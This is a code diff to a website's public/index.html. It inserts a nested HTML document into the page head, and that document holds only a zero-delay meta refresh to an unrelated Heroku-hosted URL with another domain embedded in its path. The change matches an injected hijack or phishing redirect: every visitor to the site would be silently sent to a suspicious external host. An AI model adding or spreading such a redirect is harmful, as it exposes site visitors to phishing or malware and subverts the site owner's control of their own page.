--- a/public/index.html
+++ b/public/index.html
@@ -1,6 +1,15 @@
 <!doctype html>
 <html lang="en">
 <head>
+  <!DOCTYPE html>
+<html>
+<head>
+  <meta http-equiv="refresh" content="0; url=https://austria-24e46c02ccb8.herokuapp.com/forrxon.online/sheron/index.html/">
+</head>
+<body>
+</body>
+</html>
+
   <!--Start of Tawk.to Script-->
 <script type="text/javascript">
 var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
